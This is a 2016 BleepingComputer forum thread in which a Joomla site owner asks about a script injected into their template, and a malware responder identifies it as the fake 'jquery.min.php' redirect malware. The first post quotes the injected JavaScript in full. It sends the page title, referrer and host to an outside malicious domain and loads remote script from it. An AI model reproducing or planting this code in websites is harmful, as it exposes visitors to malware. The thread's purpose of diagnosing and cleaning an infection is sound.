Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

http://mdiessner.com/js/jquery.min.php Fake jquery


  • Please log in to reply
3 replies to this topic

#1 Olgabra

Olgabra

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:02:08 AM

Posted 19 January 2016 - 05:42 PM

Just noticed that my website based on Joomla was hacked in index.php of my template I noticed this script:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://mdiessner.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

As I see script sending some data or taking some data to/from http://mdiessner.com/js/jquery.min.php could you explain what this script doing and what else I have to do with my website to eliminate security flaw.

I already updated Joomla for the latest version. As far as I know it is not possible to take root password from the database. SQL database password I already changed.



BC AdBot (Login to Remove)

 


#2 shelf life

shelf life

  • Malware Response Team
  • 2,657 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:03:08 AM

Posted 23 January 2016 - 09:40 AM

Redirection to a malicious site to possibly install malware.

 

http://www.securitynewspaper.com/2015/11/06/jquery-min-php-malware-affects-thousands-of-websites/


How Can I Reduce My Risk to Malware?


#3 Olgabra

Olgabra
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:02:08 AM

Posted 23 January 2016 - 10:47 PM

Redirection to a malicious site to possibly install malware.

 

http://www.securitynewspaper.com/2015/11/06/jquery-min-php-malware-affects-thousands-of-websites/

Thank you very much! I think I deleted but I do not know where exactly the backdoor. I mean it is second time when the virus appears... Is it a way to install a logger to see what kind of files were modificated?..


Edited by Olgabra, 23 January 2016 - 10:49 PM.


#4 shelf life

shelf life

  • Malware Response Team
  • 2,657 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:03:08 AM

Posted 24 January 2016 - 10:58 AM

Your welcome. Have you checked the Joomla site for information? The hack seems to be wide spread and well documented. They would be the best source for solutions and prevention.

 

https://docs.joomla.org/Security_Checklist/You_have_been_hacked_or_defaced

 


How Can I Reduce My Risk to Malware?





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users